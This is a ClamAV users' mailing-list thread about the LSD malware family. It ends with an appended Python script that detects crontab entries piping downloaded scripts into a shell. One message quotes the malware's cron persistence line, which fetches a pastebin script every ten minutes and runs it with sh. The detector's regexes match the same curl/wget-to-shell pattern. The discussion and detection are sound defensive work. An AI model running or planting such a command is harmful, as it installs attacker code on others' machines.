[clamav-users] LSD Malwares
Joel Esler (jesler)
jesler at cisco.com
Mon Apr 29 13:33:13 UTC 2019
Thank you for writing in.
Go to this URL to change user options or unsubscribe:
https://lists.Clamav.net/mailman/listinfo/Clamav-users
or by sending an email to Clamav-users-leave at lists.Clamav.net
Thanks!
-- Joel Esler Manager, Communities Division Cisco Talos Intelligence Group http://www.talosintelligence.com
On Apr 26, 2019, at 1:35 PM, Vicstardust via clamav-users <clamav-users at lists.clamav.net> wrote:
Pls check my Previous EMAIL "UNSUBSCRIBE ME...ETC", just sent.
TXS
Have a nice Weekend!
On 26/04/2019, at 04:26, Xavier Maysonnave via clamav-users <clamav-users at lists.clamav.net> wrote:
Hi All,
Thanks for your feedback.
I'm going to report to Cloudflare this URL.
However, keep in mind that there are other URLs that are involved in this family.
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh
This one targets Jenkins, another popular OpenSource tool, not used on our infrastructure though.
I'm still very interested in the consequences of this malware. Any hints will be greatly appreciated.
Thanks.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9 <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
On Fri, Apr 26, 2019 at 08:03, Dave Warren via clamav-users <clamav-users at lists.clamav.net> wrote:
The same applies: Report it. Cloudflare will either forward the
complaint for you, or block the offending URL (or both).
On 2019-04-25 19:16, Dennis Peterson wrote:
> That domain is hosted on a Cloudflare IP block. They've become part of
> the problem.
>
> dp
>
> On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>> hosting provider & domain registrar that they are hosting malware and
>> get that site shut down...
>>
_______________________________________________
clamav-users mailing list
clamav-users at lists.clamav.net
https://lists.clamav.net/mailman/listinfo/clamav-users
Help us build a comprehensive ClamAV guide:
https://github.com/vrtadmin/clamav-faq
http://www.clamav.net/contact.html#ml
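
The cron entry quoted in the thread re-fetches a remote script every ten minutes and pipes it straight into `sh`. As an added example (not from the thread or from ClamAV), this Python check flags crontab entries of that shape; the function names and every sample line other than the quoted entry are constructed for illustration.

```python
import re

FETCH = re.compile(r"\b(?:curl|wget)\b")  # a downloader appears in the command
# A single pipe (not the || operator) feeding a shell, with or without a path.
PIPE_TO_SHELL = re.compile(r"(?<!\|)\|\s*(?:\S*/)?(?:ba|da|z|k)?sh\b")
URL = re.compile(r"https?://[^\s|)'\"]+")
ENV_ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def split_entry(line):
    """Return (schedule, command) for a crontab entry, or None for other lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
        return None
    width = 1 if line.startswith("@") else 5  # @reboot-style vs five time fields
    parts = line.split(None, width)
    if len(parts) <= width:
        return None
    # In /etc/crontab and /etc/cron.d the command part also carries the user
    # field; the patterns above search the whole remainder, so that is harmless.
    return " ".join(parts[:width]), parts[width]


def find_fetch_and_exec(crontab_text):
    """List entries that download remote content and pipe it into a shell."""
    findings = []
    for number, line in enumerate(crontab_text.splitlines(), start=1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        if FETCH.search(command) and PIPE_TO_SHELL.search(command):
            urls = list(dict.fromkeys(URL.findall(command)))  # dedupe, keep order
            findings.append({"line": number, "schedule": schedule, "urls": urls})
    return findings


SAMPLE = """\
# Constructed crontab: line 4 is the entry quoted in the thread, the rest is benign.
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh | logger -t backup
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh
15 4 * * 0 curl -fsS -o /var/tmp/feed.json https://example.invalid/feed.json
@daily wget -q -O /dev/null https://example.invalid/ping || echo failed | logger
"""

if __name__ == "__main__":
    for finding in find_fetch_and_exec(SAMPLE):
        print(finding)
```

Feed it the output of `crontab -l` for each account and the files under `/etc/cron.d` and `/var/spool/cron`; the URLs it returns are the ones to include in an abuse report.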